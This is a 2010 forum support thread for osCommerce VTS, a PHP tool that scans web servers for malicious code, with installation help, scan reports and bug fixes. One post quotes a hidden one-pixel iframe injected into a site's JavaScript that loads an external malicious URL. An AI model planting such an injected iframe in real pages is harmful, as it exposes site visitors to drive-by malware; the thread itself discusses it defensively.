Guest Posted March 24, 2010 Share Posted March 24, 2010 osCommerce VTS - Virus & Threat Scanner Support thread (Please be kind to me since english is not my first language) Welcome to osCommerce VTS. In the ever-decreasing world of Internet security, web servers are fast becoming a target for spammers and authors of malicious code to spread their nasties. Server security is paramount, and the spread of malicious code can be prevented by competent administrators and knowledgable web masters. But why not be on the safe side? osCommerce VTS is designed to run on your web server and scan your public web files for malicious code. It is small, portable and efficient, uses minimal server resources, and provides a full report on what has been discovered. This software is provided as-is, without warranty or guarantee of any kind. Use at your own risk. osCommerce VTS runs on Linux web servers (it has been known to function under Windows), and is optimised to run on shared web hosting accounts. Although osCommerce VTS may function with older versions, it remains untested and unsuported. Therefore I recommend you have the following installed on your server: * Apache 1.3 or higher * PHP 4.3.x or higer What osCommerce VTS does: * Scan for known *.php hacker files * Scan for known hacker sites & IP's * Scan for known suspicious code * Scan all types of files on your site (Not only php files) * Scan for open tag inside GIF image * Scan for possible shell execution * Scan for suspicious COOKIE references ...and more to come.. The contribution can be found at: osCommerce VTS Quote Link to comment Share on other sites More sharing options...
bethbud Posted March 31, 2010 Share Posted March 31, 2010 Forgive my limited experience... Just need a little clarification of instructions. * Edit config.php to your needs......What would my needs be?IS some modification needed? * CHMOD all files 755 or lower.......What does CHMOD mean? * - add above: <!--osCommerce Virus & Threat Scan --> <?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; ?> <!--osCommerce Virus & Threat Scan --> ................Add this above the first </td> ? Thanks, ~*Beth Quote Link to comment Share on other sites More sharing options...
bethbud Posted March 31, 2010 Share Posted March 31, 2010 Having trouble pinpointing it. This is my header.php. So where do I add the code? Thanks so much. Appreciate it! <?php /* $Id: header.php 3 2006-05-27 04:59:07Z user $ osCMax Power E-Commerce http://oscdox.com Copyright 2006 osCMax2005 osCMax, 2002 osCommerce Released under the GNU General Public License */ if ($messageStack->size > 0) { echo $messageStack->output(); } ?> <table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td><?php echo '<a href="http://www.oscmax.com">''>http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td> <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a> <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a> <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?> </td> </tr> <tr class="headerBar"> <?php /* BOF: MOD - Admin Security */ ?> <?php /* old- <td class="headerBarContent"> <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?> <?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> */ ?> <td class="headerBarContent"> <?php if (tep_session_is_registered('login_id')) { echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>'; } else { echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; } ?></td> <td class="headerBarContent" align="right"><?php echo ' <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a> | <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> <?php /* EOF: MOD - Admin Security */ ?> </tr> </table> Quote Link to comment Share on other sites More sharing options...
Guest Posted March 31, 2010 Share Posted March 31, 2010 Forgive my limited experience... Just need a little clarification of instructions. * Edit config.php to your needs......What would my needs be?IS some modification needed? e.g. You can configure the program where you want it to start scan: $CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT']; or $CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT']."/catalog"; * CHMOD all files 755 or lower.......What does CHMOD mean? You have to set file permission to 755 or lower * - add above: <!--osCommerce Virus & Threat Scan --> <?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; ?> <!--osCommerce Virus & Threat Scan --> ................Add this above the first </td> ? See my reply on your next message.. Quote Link to comment Share on other sites More sharing options...
Guest Posted March 31, 2010 Share Posted March 31, 2010 Having trouble pinpointing it. This is my header.php. So where do I add the code? Thanks so much. Appreciate it! Here is your updated header.php file. I have inserted the code for osCommerce VTS in it: <?php /* $Id: header.php 3 2006-05-27 04:59:07Z user $ osCMax Power E-Commerce [url="http://oscdox.com"]http://oscdox.com[/url] Copyright 2006 osCMax2005 osCMax, 2002 osCommerce Released under the GNU General Public License */ if ($messageStack->size > 0) { echo $messageStack->output(); } ?> <table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td> <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a> <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a> <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?> </td> </tr> <tr class="headerBar"> <?php /* BOF: MOD - Admin Security */ ?> <?php /* old- <td class="headerBarContent"> <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?> <?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> */ ?> <td class="headerBarContent"> <?php if (tep_session_is_registered('login_id')) { echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>'; } else { echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; } ?> <!--osCommerce Virus & Threat Scan --> <?php echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; ?> <!--osCommerce Virus & Threat Scan --> </td> <td class="headerBarContent" align="right"><?php echo ' <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a> | <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a> | <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a> | <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?> </td> <?php /* EOF: MOD - Admin Security */ ?> </tr> </table> Hope this help. Remeber to BACKUP before you do any changes on your site! Quote Link to comment Share on other sites More sharing options...
danut82 Posted April 1, 2010 Share Posted April 1, 2010 (edited) salve, it is a problem one of this message? public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution) public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found) public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( ) public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe) public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( ) public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( ) public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) ) Thanks Edited April 1, 2010 by danut82 Quote Link to comment Share on other sites More sharing options...
Guest Posted April 2, 2010 Share Posted April 2, 2010 salve, it is a problem one of this message? public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution) I have the same report for this file, no problem. But to be sure, compare it with the original one. public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found) public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( ) public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe) public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( ) public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( ) public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) ) These files I dont know since it is a contribution I dont use. You should compare these files with the original ones to see if there is any changes that sould not be in them. Quote Link to comment Share on other sites More sharing options...
smic717394 Posted April 23, 2010 Share Posted April 23, 2010 Somebody injected one of out java scripts with the code bellow, and is not been detected. var jquery = '<iframe height=1 width=1 border=0 src="http:// melopp.biz/fol/?606717496665bcba"> </iframe>'; Quote Link to comment Share on other sites More sharing options...
Guest Posted April 23, 2010 Share Posted April 23, 2010 Somebody injected one of out java scripts with the code bellow, and is not been detected. var jquery = '<iframe height=1 width=1 border=0 src="http:// melopp.biz/fol/?606717496665bcba"> </iframe>'; oooops A small checking is missing in the code that cause the scanner to NOT scan files with 2, 4 or 5 letter extention. I have fixed this and will UL a new version today. Thanks for pointing this out for me! Quote Link to comment Share on other sites More sharing options...
Guest Posted April 23, 2010 Share Posted April 23, 2010 A new version is uploaded now: osCommerce VTS 1.0.4 If you are using this scanner, PLEASE update to this version because of a critical error in older versions! Quote Link to comment Share on other sites More sharing options...
Guest Posted May 4, 2010 Share Posted May 4, 2010 A new version is now made available : osCommerce VTS 1.0.5 Whats new: * Added check for leading & trailing whitespace in .php files I added this check because of all the problems people out there have with leading and trailing whitespace. As Spook said: "very common issue after editing with the likes of filemanager, to add confusion, spaces at the end do not always cause issues at first, but issues can randomly occur later, maybe just through re-uploading the same file!! " Quote Link to comment Share on other sites More sharing options...
Guest Posted May 6, 2010 Share Posted May 6, 2010 Thanks for this contribution, I'll install it soon. Just a quick question with regards to your newest scan for whitespace in php files, is it possible for you to include the option to delete these trailing whitespaces? I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL). Thanks. Quote Link to comment Share on other sites More sharing options...
Guest Posted May 6, 2010 Share Posted May 6, 2010 Thanks for this contribution, I'll install it soon. Just a quick question with regards to your newest scan for whitespace in php files, is it possible for you to include the option to delete these trailing whitespaces? I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL). I have implemented that for the next version, but I need to do some more testing of it.. Quote Link to comment Share on other sites More sharing options...
Guest Posted May 6, 2010 Share Posted May 6, 2010 Great, looking forward to it. I have another question/suggestion (you can read more about it here) http://www.oscommerce.com/forums/topic/358244-php-self/ with regards to PHP_SELF in code, can cause problems. For interest sake I searched for this term in my Oscommerce files and it appears several hundred times. What are your comments on this? (I'm not a coder hence the question). Quote Link to comment Share on other sites More sharing options...
Guest Posted May 6, 2010 Share Posted May 6, 2010 Great, looking forward to it. I have another question/suggestion (you can read more about it here) http://forums.oscomm...58244-php-self/ with regards to PHP_SELF in code, can cause problems. For interest sake I searched for this term in my Oscommerce files and it appears several hundred times. What are your comments on this? (I'm not a coder hence the question). I havent studied php_self much, but yes, it can cause problems like Cross Site Scripting (XSS). And yes, php_self is used alot in osCommerce. I am not an expert on this, but what is said about this is: "Every PHP_SELF should be converted to HTML entities, with a function like htmlentities" There is contributions for osCommerce that prevents XSS If you have not allready done it, then read How to secure your site Quote Link to comment Share on other sites More sharing options...
Guest Posted May 6, 2010 Share Posted May 6, 2010 Yes I've already got the contrib for anti-XSS. I was just wondering about it, and this solution was recommended : http://www.oscommerce.com/forums/topic/348589-serious-hole-found-in-oscommerce/page__view__findpost__p__1467014 Quote Link to comment Share on other sites More sharing options...
Guest Posted May 19, 2010 Share Posted May 19, 2010 A New version has been uploaded. Whats new: * Added new file for handling whitespace configuration (whitespace.php) * Added choice for removing leading and trailing whitespace REMEMBER BACKUP!! ================ Quote Link to comment Share on other sites More sharing options...
hetmana Posted September 8, 2010 Share Posted September 8, 2010 (edited) ======== On ocVTS.php ======== ABOVE the results, I get THOUSANDS of the following error: Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143 I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times? BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that. ======== On ocVTSa.php ======== No notices/errors other than the actual results, just 19 counts of (shell execution) that I need to inspect against original files. ------------------------- Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5" Edited September 8, 2010 by hetmana Quote Link to comment Share on other sites More sharing options...
Guest Posted September 10, 2010 Share Posted September 10, 2010 ======== On ocVTS.php ======== ABOVE the results, I get THOUSANDS of the following error: Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143 Fixed in next release.. sorry.. I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times? This I dont know, could you post here the listing from ocVTS please? BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that. It is looking for any case of a admin dir. If you have other utils installed that have a admin dir, then ocVTS will report that.. Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5" This was a litle miss. Is fixed now.. Quote Link to comment Share on other sites More sharing options...
hetmana Posted September 11, 2010 Share Posted September 11, 2010 Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143 I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times? This I dont know, could you post here the listing from ocVTS please? Line 143 is the line that is specifically looking for file_manager.php. I assume that's what you mention fixing in the next release (?) Thanks for jumping on this so quickly -- MUCH appreciated!! B) Quote Link to comment Share on other sites More sharing options...
Guest Posted September 11, 2010 Share Posted September 11, 2010 Line 143 is the line that is specifically looking for file_manager.php. I assume that's what you mention fixing in the next release (?) flagThreat is a variable that flag all threats, not specific to file_manager.php Just to be sure, did you get this line listed: You should delete file_manager.php from your admin folder ! Quote Link to comment Share on other sites More sharing options...
Guest Posted September 14, 2010 Share Posted September 14, 2010 A new version released today. Whats new: * Implemented a grep function where you can search your site for your own keywords * Fixed a undefined variable bug * Fixed ocVTS to check for only osCommerce's renamed admin dir Have fun! Quote Link to comment Share on other sites More sharing options...
pac_indahood Posted September 15, 2010 Share Posted September 15, 2010 i can't connect Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233 Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234 Where is issue? Thanks Quote Link to comment Share on other sites More sharing options...
Guest Posted September 15, 2010 Share Posted September 15, 2010 i can't connect Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233 Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234 Where is issue? Thanks Did you fill in these in whitespace.php : $ftp_site = 'yoursite.com'; // your ftp site $ftp_usr = 'username'; // your ftp username $ftp_pwd = 'password'; // your ftp password $ftp_root = 'public_html'; // your ftp site root folder Quote Link to comment Share on other sites More sharing options...
pac_indahood Posted September 17, 2010 Share Posted September 17, 2010 thank you, i didn't saw. Now i have another problem Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.